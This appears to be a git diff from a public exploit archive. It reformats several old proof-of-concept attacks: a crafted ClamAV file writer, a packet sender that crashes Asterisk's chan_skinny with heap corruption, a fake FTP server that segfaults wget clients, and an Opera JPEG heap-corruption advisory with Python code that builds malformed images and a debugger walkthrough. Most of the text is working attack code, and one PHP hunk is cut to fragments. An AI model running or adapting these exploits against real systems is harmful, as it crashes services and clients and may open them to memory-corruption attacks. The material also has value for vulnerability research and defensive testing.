+"\x6D\x67\x2F\x72\x61\x6E\x67\x65\x2E\x67\x69\x66\x01\xA0\xE0\x32\xF1\x6C\x0F\x2F\x69\x6D\x67\x2F\x52". +"\x61\x74\x69\x6E\x67\x2E\x6A\x70\x67\x01\x98\xAE\x04\x85\x2E\x13\x2F\x69\x6D\x67\x2F\x52\x61\x74\x69". +"\x6E\x67\x5F\x62\x61\x64\x2E\x6A\x70\x67\x01\x98\xB3\x32\x85\x49\x15\x2F\x69\x6D\x67\x2F\x73\x65\x63". +"\x75\x72\x65\x5F\x68\x61\x73\x68\x31\x2E\x6A\x70\x67\x01\xC5\xFB\x29\xB2\x58\x15\x2F\x69\x6D\x67\x2F". +"\x73\x65\x63\x75\x72\x65\x5F\x68\x61\x73\x68\x32\x2E\x6A\x70\x67\x01\xC6\xAE\x01\xDA\x3A\x15\x2F\x69". +"\x6D\x67\x2F\x73\x65\x63\x75\x72\x65\x5F\x68\x61\x73\x68\x33\x2E\x6A\x70\x67\x01\xC7\x88\x3B\xC9\x4B". +"\x15\x2F\x69\x6D\x67\x2F\x73\x65\x63\x75\x72\x65\x5F\x68\x61\x73\x68\x34\x2E\x6A\x70\x67\x01\xC7\xD2". +"\x06\xC1\x72\x11\x2F\x69\x6D\x67\x2F\x73\x65\x74\x74\x69\x6E\x67\x31\x2E\x67\x69\x66\x01\x9E\x86\x5C". +"\xCA\x7F\x11\x2F\x69\x6D\x67\x2F\x73\x65\x74\x74\x69\x6E\x67\x32\x2E\x67\x69\x66\x01\x9F\x9C\x53\xDE". +"\x69\x11\x2F\x69\x6D\x67\x2F\x73\x65\x74\x74\x69\x6E\x67\x33\x2E\x67\x69\x66\x01\x9E\xD1\x5B\xCA\x78". +"\x11\x2F\x69\x6D\x67\x2F\x53\x68\x61\x72\x65\x61\x7A\x61\x2E\x6A\x70\x67\x01\x97\xF4\x27\x89\x62\x15". +"\x2F\x69\x6D\x67\x2F\x53\x4D\x43\x37\x30\x30\x34\x41\x42\x52\x5F\x31\x2E\x6A\x70\x67\x01\xB2\xCD\x38". +"\x81\xD8\x44\x19\x2F\x69\x6D\x67\x2F\x53\x4D\x43\x37\x30\x30\x34\x41\x42\x52\x5F\x32\x5F\x77\x32\x6B". +"\x2E\x6A\x70\x67\x01\xB4\xA5\x7C\x81\xEA\x68\x19\x2F\x69\x6D\x67\x2F\x53\x4D\x43\x37\x30\x30\x34\x41". +"\x42\x52\x5F\x32\x5F\x77\x39\x78\x2E\x6A\x70\x67\x01\xB6\x90\x64\x81\xF8\x31\x17\x2F\x69\x6D\x67\x2F". +"\x53\x4D\x43\x37\x30\x30\x34\x41\x42\x52\x5F\x33\x2E\x31\x2E\x6A\x70\x67\x01\xB8\x89\x15\xB1\x2B\x17". +"\x2F\x69\x6D\x67\x2F\x53\x4D\x43\x37\x30\x30\x34\x41\x42\x52\x5F\x33\x2E\x32\x2E\x6A\x70\x67\x01\xB8". +"\xBA\x40\x81\x80\x47\x12\x2F\x69\x6D\x67\x2F\x73\x6F\x6C\x77\x69\x73\x65\x20\x31\x2E\x67\x69\x66\x01". +"\xB9\xF6\x70\xA3\x57\x12\x2F\x69\x6D\x67\x2F\x73\x6F\x6C\x77\x69\x73\x65\x20\x32\x2E\x67\x69\x66\x01". +"\xBA\x9A\x47\x9B\x5E\x12\x2F\x69\x6D\x67\x2F\x73\x6F\x6C\x77\x69\x73\x65\x20\x33\x2E\x67\x69\x66\x01". +"\xBA\xB6\x25\xA7\x13\x12\x2F\x69\x6D\x67\x2F\x73\x6F\x6C\x77\x69\x73\x65\x20\x35\x2E\x67\x69\x66\x01". +"\xBA\xDD\x38\xB7\x07\x12\x2F\x69\x6D\x67\x2F\x73\x6F\x6C\x77\x69\x73\x65\x20\x36\x2E\x67\x69\x66\x01". +"\xBB\x94\x3F\xAF\x06\x12\x2F\x69\x6D\x67\x2F\x73\x6F\x6C\x77\x69\x73\x65\x20\x37\x2E\x67\x69\x66\x01". +"\xBB\xC3\x45\x8E\x33\x12\x2F\x69\x6D\x67\x2F\x73\x6F\x6C\x77\x69\x73\x65\x20\x38\x2E\x67\x69\x66\x01". +"\xBB\xD1\x78\xE9\x73\x13\x2F\x69\x6D\x67\x2F\x53\x74\x61\x74\x75\x73\x5F\x42\x61\x72\x2E\x6A\x70\x67". +"\x01\x95\xBC\x76\xBC\x23\x0D\x2F\x69\x6D\x67\x2F\x74\x61\x62\x73\x2E\x67\x69\x66\x01\x9F\xFB\x3C\xA0". +"\x00\x0F\x2F\x69\x6D\x67\x2F\x75\x70\x6E\x70\x6F\x6E\x2E\x67\x69\x66\x01\x9C\x88\x6F\xCD\x51\x18\x2F". +"\x69\x6D\x67\x2F\x77\x65\x62\x73\x65\x72\x76\x65\x72\x5F\x6C\x6F\x67\x69\x6E\x2E\x6A\x70\x67\x01\xC2". +"\x97\x37\xCB\x6F\x1A\x2F\x69\x6D\x67\x2F\x77\x65\x62\x73\x65\x72\x76\x65\x72\x5F\x6F\x70\x74\x69\x6F". +"\x6E\x73\x2E\x6A\x70\x67\x01\xC2\xE3\x26\x81\x89\x42\x13\x2F\x69\x6D\x67\x2F\x78\x70\x66\x69\x72\x65". +"\x77\x61\x6C\x6C\x2E\x67\x69\x66\x01\x9C\xD6\x40\xB4\x69\x0A\x2F\x69\x6E\x64\x65\x78\x2E\x68\x74\x6D". +"\x01\x8E\xE3\x4D\x8E\x77\x0D\x2F\x69\x70\x66\x69\x6C\x74\x65\x72\x2E\x68\x74\x6D\x01\x8E\xF2\x44\x9B". +"\x63\x08\x2F\x69\x72\x63\x2E\x68\x74\x6D\x01\x84\xB5\x43\x91\x2A\x09\x2F\x6C\x61\x6E\x67\x2E\x68\x74". +"\x6D\x01\x84\xC6\x6D\xA0\x4B\x0C\x2F\x6C\x69\x6E\x6B\x73\x79\x73\x2E\x68\x74\x6D\x01\x84\xE7\x38\x81". +"\x9A\x2F\x0A\x2F\x6C\x69\x73\x74\x73\x2E\x68\x74\x6D\x01\x8F\xE9\x4D\x8F\x33\x0B\x2F\x6C\x75\x63\x65". +"\x6E\x74\x2E\x68\x74\x6D\x01\x86\x81\x67\x9C\x5D\x0A\x2F\x70\x6F\x72\x74\x73\x2E\x68\x74\x6D\x01\x86". +"\x9E\x44\xE0\x3D\x14\x2F\x70\x72\x65\x66\x5F\x63\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x2E\x68\x74\x6D". +"\x01\x86\xFF\x01\xC7\x4E\x0D\x2F\x70\x72\x65\x66\x5F\x64\x69\x72\x2E\x68\x74\x6D\x01\x87\xC6\x4F\xA5". +"\x05\x11\x2F\x70\x72\x65\x66\x5F\x64\x69\x73\x70\x6C\x61\x79\x2E\x68\x74\x6D\x01\x8F\xF9\x00\x9D\x4C". +"\x12\x2F\x70\x72\x65\x66\x5F\x65\x78\x74\x65\x6E\x64\x65\x64\x2E\x68\x74\x6D\x01\x87\xEB\x54\xB9\x40". +"\x0F\x2F\x70\x72\x65\x66\x5F\x66\x69\x6C\x65\x73\x2E\x68\x74\x6D\x01\x88\xA5\x14\xBD\x59\x11\x2F\x70". +"\x72\x65\x66\x5F\x67\x65\x6E\x65\x72\x61\x6C\x2E\x68\x74\x6D\x01\x88\xE2\x6D\xBA\x3D\x0D\x2F\x70\x72". +"\x65\x66\x5F\x69\x72\x63\x2E\x68\x74\x6D\x01\x89\x9D\x2A\x96\x63\x0F\x2F\x70\x72\x65\x66\x5F\x6E\x6F". +"\x74\x65\x73\x2E\x68\x74\x6D\x01\x89\xB4\x0D\x97\x55\x11\x2F\x70\x72\x65\x66\x5F\x70\x72\x65\x66\x69". +"\x6E\x69\x2E\x68\x74\x6D\x01\x91\xA8\x7E\x97\x18\x0F\x2F\x70\x72\x65\x66\x5F\x70\x72\x6F\x78\x79\x2E". +"\x68\x74\x6D\x01\x91\xC0\x16\xB2\x26\x13\x2F\x70\x72\x65\x66\x5F\x73\x63\x68\x65\x64\x75\x6C\x65\x72". +"\x2E\x68\x74\x6D\x01\x91\xF2\x3C\xB5\x69\x12\x2F\x70\x72\x65\x66\x5F\x73\x65\x63\x75\x72\x69\x74\x79". +"\x2E\x68\x74\x6D\x01\x8F\x8E\x27\xA8\x7B\x10\x2F\x70\x72\x65\x66\x5F\x73\x65\x72\x76\x65\x72\x2E\x68". +"\x74\x6D\x01\x89\xCB\x62\xAC\x1C\x0F\x2F\x70\x72\x65\x66\x5F\x73\x74\x61\x74\x73\x2E\x68\x74\x6D\x01". +"\x89\xF7\x7E\x9A\x4E\x13\x2F\x70\x72\x65\x66\x5F\x77\x65\x62\x73\x65\x72\x76\x65\x72\x2E\x68\x74\x6D". +"\x01\x90\x96\x4C\xA5\x52\x0C\x2F\x70\x72\x65\x76\x69\x65\x77\x2E\x68\x74\x6D\x01\x8A\x92\x4C\x95\x3C". +"\x0D\x2F\x70\x72\x6F\x67\x72\x65\x73\x73\x2E\x68\x74\x6D\x01\x8A\xA8\x08\xAC\x40\x0E\x2F\x71\x75\x65". +"\x75\x65\x72\x61\x6E\x6B\x2E\x68\x74\x6D\x01\x8A\xD4\x48\x89\x19\x0B\x2F\x72\x61\x74\x69\x6E\x67\x2E". +"\x68\x74\x6D\x01\x8A\xDD\x61\xAB\x3E\x0C\x2F\x72\x6F\x75\x74\x65\x72\x73\x2E\x68\x74\x6D\x01\x8B\x89". +"\x1F\x9A\x1E\x0C\x2F\x73\x65\x63\x68\x61\x73\x68\x2E\x68\x74\x6D\x01\x92\xF0\x24\xA8\x7D\x0E\x2F\x73". +"\x69\x67\x6E\x61\x74\x75\x72\x65\x2E\x68\x74\x6D\x01\x8B\xA3\x3D\x8E\x5D\x0F\x2F\x53\x4D\x43\x37\x30". +"\x30\x34\x41\x42\x52\x2E\x68\x74\x6D\x01\x8B\xB2\x1A\x82\x83\x32\x0C\x2F\x73\x6F\x6C\x77\x69\x73\x65". +"\x2E\x68\x74\x6D\x01\x8D\xB5\x4C\xA2\x09\x0B\x2F\x73\x6F\x75\x72\x63\x65\x2E\x68\x74\x6D\x01\x8D\xD7". +"\x55\x95\x28\x0A\x2F\x73\x74\x61\x72\x74\x2E\x68\x74\x6D\x01\x8D\xEC\x7D\xAF\x0C\x16\x2F\x54\x61\x62". +"\x6C\x65\x20\x6F\x66\x20\x43\x6F\x6E\x74\x65\x6E\x74\x73\x2E\x68\x68\x63\x01\x93\x99\x21\xC8\x6D\x0A". +"\x2F\x74\x6F\x6F\x6C\x73\x2E\x68\x74\x6D\x01\x8E\x9C\x09\xA5\x6D\x14\x2F\x74\x72\x6F\x75\x62\x6C\x65". +"\x73\x68\x6F\x6F\x74\x69\x6E\x67\x2E\x68\x74\x6D\x01\x92\xA8\x25\xC7\x7F\x12\x2F\x75\x70\x64\x61\x74". +"\x65\x5F\x73\x65\x72\x76\x65\x72\x2E\x68\x74\x6D\x01\x8E\xC1\x76\xA1\x57\x0F\x2F\x75\x73\x65\x64\x5F". +"\x66\x69\x6C\x65\x73\x2E\x68\x74\x6D\x01\x90\xD2\x57\xD6\x27\x0E\x2F\x77\x65\x62\x73\x65\x72\x76\x65". +"\x72\x2E\x68\x74\x6D\x01\x90\xBC\x1E\x96\x39\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x3A\x0F\xD6\x0E\x72\x0E\x06\x0E\x8E\x0D\x1D\x0D\xB3\x0C\x5B\x0C\xD9\x0B\x60\x0B\xDD\x0A". +"\x48\x0A\xC8\x09\x4B\x09\xAD\x08\x1E\x08\x88\x07\x04\x07\x80\x06\xFF\x05\x7E\x05\xE2\x04\x4D\x04\xD1". +"\x03\x59\x03\xCE\x02\x45\x02\x98\x01\x47\x01\xE8\x00\x8D\x00\xD7\x00\x07\x00\x50\x4D\x47\x49\xDF\x0F". +"\x00\x00\x01\x2F\x00\x14\x3A\x3A\x44\x61\x74\x61\x53\x70\x61\x63\x65\x2F\x4E\x61\x6D\x65\x4C\x69\x73". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; + +open FILE, ">clam.cfm" or die; +binmode(FILE); +print FILE $clam; +close FILE; + +# milw0rm.com [2006-10-17] diff --git a/platforms/multiple/dos/2597.pl b/platforms/multiple/dos/2597.pl index 86c5536e9..f1910bc0b 100755 --- a/platforms/multiple/dos/2597.pl +++ b/platforms/multiple/dos/2597.pl @@ -1,30 +1,30 @@ -#!/usr/bin/perl -# Beyond Security -# Copyright Noam Rathaus - -# -# The following proof of concept causes the chan_skippy to crash in different locations and due to -# memory corruption as well as double free calls, this is based on the finding of -# Security-Assessment.com, and proves that the vulnerability is indeed exploitable and there... -# - -use IO::Socket; -use strict; - -my $target = "127.0.0.1"; - -my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $target, PeerPort => "2000"); - -unless ($remote) { die "cannot connect to skinny daemon on $target" } - -my $packet = "A"x1000; #Causes *** glibc detected *** malloc(): memory corruption: 0x08175830 *** -my $packet = "\x30\xE0\x00\x00"."\x00\x00\x00\x00".("A"x1000); # *** glibc detected *** double free or corruption (!prev): 0x08184348 *** -my $packet = "\xE5\x03\x00\x00".("A"x996); # *** glibc detected *** double free or corruption (out): 0x08171740 *** -my $packet = "\xF0\xFF\xFF\xFF".("A"x996); # Program received signal SIGSEGV, Segmentation fault. -#[Switching to Thread -1494127696 (LWP 9909)] -#0xa76264cb in skinny_session (data=0x8183ee8) at chan_skinny.c:2896 -#2896 memcpy(req, s->inbuf, letohl(*(int*)(s->inbuf))+8); - -print $remote $packet; - -# milw0rm.com [2006-10-19] +#!/usr/bin/perl +# Beyond Security +# Copyright Noam Rathaus + +# +# The following proof of concept causes the chan_skippy to crash in different locations and due to +# memory corruption as well as double free calls, this is based on the finding of +# Security-Assessment.com, and proves that the vulnerability is indeed exploitable and there... +# + +use IO::Socket; +use strict; + +my $target = "127.0.0.1"; + +my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $target, PeerPort => "2000"); + +unless ($remote) { die "cannot connect to skinny daemon on $target" } + +my $packet = "A"x1000; #Causes *** glibc detected *** malloc(): memory corruption: 0x08175830 *** +my $packet = "\x30\xE0\x00\x00"."\x00\x00\x00\x00".("A"x1000); # *** glibc detected *** double free or corruption (!prev): 0x08184348 *** +my $packet = "\xE5\x03\x00\x00".("A"x996); # *** glibc detected *** double free or corruption (out): 0x08171740 *** +my $packet = "\xF0\xFF\xFF\xFF".("A"x996); # Program received signal SIGSEGV, Segmentation fault. +#[Switching to Thread -1494127696 (LWP 9909)] +#0xa76264cb in skinny_session (data=0x8183ee8) at chan_skinny.c:2896 +#2896 memcpy(req, s->inbuf, letohl(*(int*)(s->inbuf))+8); + +print $remote $packet; + +# milw0rm.com [2006-10-19] diff --git a/platforms/multiple/dos/2857.php b/platforms/multiple/dos/2857.php index 4bce3c3ea..3a4d229ad 100755 --- a/platforms/multiple/dos/2857.php +++ b/platforms/multiple/dos/2857.php @@ -1,27 +1,27 @@ - - -> 6) + 192) . chr(($x & 63) + 128); - } -?> - -# milw0rm.com [2006-11-27] + + +> 6) + 192) . chr(($x & 63) + 128); + } +?> + +# milw0rm.com [2006-11-27] diff --git a/platforms/multiple/dos/2947.pl b/platforms/multiple/dos/2947.pl index 5f174dfd5..fcf18346b 100755 --- a/platforms/multiple/dos/2947.pl +++ b/platforms/multiple/dos/2947.pl @@ -1,63 +1,63 @@ -#!/usr/bin/perl -################################################################################ -# wget <= 1.10.2 | Unchecked Boundary Condition -# Federico L. Bossi Bonin -# -# www.globalst.com.ar -# fbossi[at]globalst.com.ar -################################################################################ - -use strict; -use IO::Socket; - - -#Resolving localhost... 127.0.0.1 -#Connecting to localhost|127.0.0.1|:21... connected. -#Logging in as anonymous ... Logged in! -#==> SYST ... -#Program received signal SIGSEGV, Segmentation fault. -#[Switching to Thread -1211496768 (LWP 22824)] -#0xb7d1c633 in strcasecmp () from /lib/tls/libc.so.6 -#(gdb) backtrace -#0 0xb7d1c633 in strcasecmp () from /lib/tls/libc.so.6 -#1 0x080542c5 in ftp_syst (csock=6, server_type=0xbfe3d854) at ftp-basic.c:1042 -#2 0x0804fa6f in getftp (u=0x80800a0, len=0xbfe3d5d8, restval=0, con=0xbfe3d840) at ftp.c:367 -#3 0x08051211 in ftp_loop_internal (u=0x80800a0, f=0x0, con=0xbfe3d840) at ftp.c:1197 -#4 0x08051877 in ftp_get_listing (u=0x80800a0, con=0xbfe3d840, f=0xbfe3d7a8) at ftp.c:1341 -#5 0x08051a83 in ftp_retrieve_glob (u=0x80800a0, con=0xbfe3d840, action=2) at ftp.c:1705 -#6 0x08052910 in ftp_loop (u=0x80800a0, dt=0xbfe3d978, proxy=0x0) at ftp.c:1875 -#7 0x08066cf8 in retrieve_url (origurl=0x8080070 "ftp://localhost", file=0xbfe3d970, newloc=0xbfe3d974, refurl=0x0,dt=0xbfe3d978) at retr.c:678 -#8 0x08061bdc in main (argc=3, argv=0xbfe3da84) at main.c:943 -#(gdb) - -my $PORT=21; -$SIG{CHLD} = 'IGNORE'; - - -my $listen = IO::Socket::INET->new(LocalPort => $PORT, Listen => 10,Proto => 'tcp',Reuse => 1); -die "Cant't bind port: $@" unless $listen; - -print "wget PoC\nWainting conections\n"; - -while (my $connection = $listen->accept){ -my $child; - - while (my $connection = $listen->accept){ - my $child; - die "Can't fork: $!" unless defined ($child = fork()); - if ($child == 0){ - $listen->close; - while() { - print $connection "220 \n"; - } - exit 0; - } - else { - print "Connecton recieved ... ",$connection->peerhost,"\n"; - $connection->close(); - } - } #while - -} #while - -# milw0rm.com [2006-12-18] +#!/usr/bin/perl +################################################################################ +# wget <= 1.10.2 | Unchecked Boundary Condition +# Federico L. Bossi Bonin +# +# www.globalst.com.ar +# fbossi[at]globalst.com.ar +################################################################################ + +use strict; +use IO::Socket; + + +#Resolving localhost... 127.0.0.1 +#Connecting to localhost|127.0.0.1|:21... connected. +#Logging in as anonymous ... Logged in! +#==> SYST ... +#Program received signal SIGSEGV, Segmentation fault. +#[Switching to Thread -1211496768 (LWP 22824)] +#0xb7d1c633 in strcasecmp () from /lib/tls/libc.so.6 +#(gdb) backtrace +#0 0xb7d1c633 in strcasecmp () from /lib/tls/libc.so.6 +#1 0x080542c5 in ftp_syst (csock=6, server_type=0xbfe3d854) at ftp-basic.c:1042 +#2 0x0804fa6f in getftp (u=0x80800a0, len=0xbfe3d5d8, restval=0, con=0xbfe3d840) at ftp.c:367 +#3 0x08051211 in ftp_loop_internal (u=0x80800a0, f=0x0, con=0xbfe3d840) at ftp.c:1197 +#4 0x08051877 in ftp_get_listing (u=0x80800a0, con=0xbfe3d840, f=0xbfe3d7a8) at ftp.c:1341 +#5 0x08051a83 in ftp_retrieve_glob (u=0x80800a0, con=0xbfe3d840, action=2) at ftp.c:1705 +#6 0x08052910 in ftp_loop (u=0x80800a0, dt=0xbfe3d978, proxy=0x0) at ftp.c:1875 +#7 0x08066cf8 in retrieve_url (origurl=0x8080070 "ftp://localhost", file=0xbfe3d970, newloc=0xbfe3d974, refurl=0x0,dt=0xbfe3d978) at retr.c:678 +#8 0x08061bdc in main (argc=3, argv=0xbfe3da84) at main.c:943 +#(gdb) + +my $PORT=21; +$SIG{CHLD} = 'IGNORE'; + + +my $listen = IO::Socket::INET->new(LocalPort => $PORT, Listen => 10,Proto => 'tcp',Reuse => 1); +die "Cant't bind port: $@" unless $listen; + +print "wget PoC\nWainting conections\n"; + +while (my $connection = $listen->accept){ +my $child; + + while (my $connection = $listen->accept){ + my $child; + die "Can't fork: $!" unless defined ($child = fork()); + if ($child == 0){ + $listen->close; + while() { + print $connection "220 \n"; + } + exit 0; + } + else { + print "Connecton recieved ... ",$connection->peerhost,"\n"; + $connection->close(); + } + } #while + +} #while + +# milw0rm.com [2006-12-18] diff --git a/platforms/multiple/dos/3101.py b/platforms/multiple/dos/3101.py index c339deddf..fd024e7fd 100755 --- a/platforms/multiple/dos/3101.py +++ b/platforms/multiple/dos/3101.py @@ -1,559 +1,559 @@ -Opera JPEG processing - Heap corruption vulnerabilities -======================================================= -Date..: 8th September 2006 - 31th October 2006 (update) - 3rd November 2006 (update) - 5th January 2007 (public release) - -http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=457 - -Author: posidron - -Application: Opera 9.01 Build 8552 -Environment: Windows XP Professional, Service Pack 2 - DE - - -Preamble -======== - -Opera is vulnerable in parsing the JPEG file format. Discovered were four -vulnerabilities, each in different segments of the file format. I will -describe in this advisory the two important ones. - -1 - ntdll.RtlAllocateHeap() DHT vulnerability -2 - ntdll.RtlAllocateHeap() SOS vulnerability - -Opera Mini for mobile phones could be vulnerable also. The second bug looks -very interesting to this topic. - - -Details -======= - -The following code produces the sample image on which all further operations -are made. It's a valid image which was generated with Adobe Photoshop. - -Properties ----------- - - Type : JPEG - Size : 1px x 1px - Compression: Low - Colors: : None - Filesize : 304 bytes - - -# File: sample.py -bytes = [ - 0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02, - 0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75, - 0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, - 0xFF, 0xEE, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00, - 0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x14, 0x10, 0x10, 0x19, 0x12, - 0x19, 0x27, 0x17, 0x17, 0x27, 0x32, 0x26, 0x1F, 0x26, 0x32, 0x2E, 0x26, 0x26, - 0x26, 0x26, 0x2E, 0x3E, 0x35, 0x35, 0x35, 0x35, 0x35, 0x3E, 0x44, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x01, 0x15, 0x19, 0x19, 0x20, 0x1C, - 0x20, 0x26, 0x18, 0x18, 0x26, 0x36, 0x26, 0x20, 0x26, 0x36, 0x44, 0x36, 0x2B, - 0x2B, 0x36, 0x44, 0x44, 0x44, 0x42, 0x35, 0x42, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x00, - 0x01, 0x00, 0x01, 0x03, 0x01, 0x22, 0x00, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, - 0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x01, 0x01, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, - 0xDA, 0x00, 0x0C, 0x03, 0x01, 0x00, 0x02, 0x11, 0x03, 0x11, 0x00, 0x3F, 0x00, - 0xB3, 0x00, 0x1F, 0xFF, 0xD9 ] - -f = open(__file__+".jpg", "wb") -for byte in bytes: f.write("%c" % byte) -f.close() -print __file__+".jpg created! (%d bytes)" % len(bytes) -# eof - -F:\vulndev\Opera> python sample.py -sample.py.jpg created! (304 bytes) -F:\vulndev\Opera> - - - ************************************************** - - -Details - ntdll.RtlAllocateHeap() DHT vulnerability ---------------------------------------------------- - -Segment: Define Huffman Table (DHT) - -DHT..................: FF C4 -Length...............: 00 4B -Index................: 00 -Number of codes......: 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 -Sum of previous bytes: 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - -We change the above to the below: - -Number of codes......: 02 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 -Sum of previous bytes: 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - - -# File: heap.py -bytes = [ - 0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02, - 0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75, - 0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, - 0xFF, 0xEE, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00, - 0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x14, 0x10, 0x10, 0x19, 0x12, - 0x19, 0x27, 0x17, 0x17, 0x27, 0x32, 0x26, 0x1F, 0x26, 0x32, 0x2E, 0x26, 0x26, - 0x26, 0x26, 0x2E, 0x3E, 0x35, 0x35, 0x35, 0x35, 0x35, 0x3E, 0x44, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x01, 0x15, 0x19, 0x19, 0x20, 0x1C, - 0x20, 0x26, 0x18, 0x18, 0x26, 0x36, 0x26, 0x20, 0x26, 0x36, 0x44, 0x36, 0x2B, - 0x2B, 0x36, 0x44, 0x44, 0x44, 0x42, 0x35, 0x42, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x00, - 0x01, 0x00, 0x01, 0x03, 0x01, 0x22, 0x00, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, - - 0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x02, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - - 0xFF, - 0xDA, 0x00, 0x0C, 0x03, 0x01, 0x00, 0x02, 0x11, 0x03, 0x11, 0x00, 0x3F, 0x00, - 0xB3, 0x00, 0x1F, 0xFF, 0xD9 ] - -f = open(__file__+".jpg", "wb") -for byte in bytes: f.write("%c" % byte) -f.close() -print __file__+".jpg created! (%d bytes)" % len(bytes) -# eof - -F:\vulndev\Opera> python heap.py -heap.py.jpg created! (304 bytes) -F:\vulndev\Opera> - - - -Analyse - ntdll.RtlAllocateHeap() DHT vulnerability ---------------------------------------------------- - -The call stack is very large, I think here is a good place to start: - -74E5D637 call dword ptr ds:[eax+4] ; set hardware bp on execution - -it's the 6th function from the top of the "crash" call stack. Restart Olly, -press F9 until Opera shows up again. - -Hit F7 until: - -74E610B6 mov bl, byte ptr ds:[eax+1] ; set hardware bp on execution - -Hit F9 until the following shows up in the panel, at this statement: - -ds:[543502E9]=C4 ('Ä') -bl=00 - -That's the marker of the "Define Huffman Table" segment. -Go on with F9, you will reach again: - -call dword ptr ds:[eax+4] - -Hit again F9, Opera shows up, drag the image into Opera. -You will reach again: - -call dword ptr ds:[eax+4] - -Hit F9 until you reached: - -74E610B6 mov bl, byte ptr ds:[eax+1] - -Hit F9 until the following shows up in the panel, at this statement: - -ds:[543502E9]=C4 ('Ä') -bl=00 - -Hit F7 to continue. - -74E5D735 push ebp -74E5D736 mov ebp, esp -... -74E5D750 mov dh, byte ptr ds:[eax+2] ; user input -74E5D753 mov dl, byte ptr ds:[eax+3] ; user 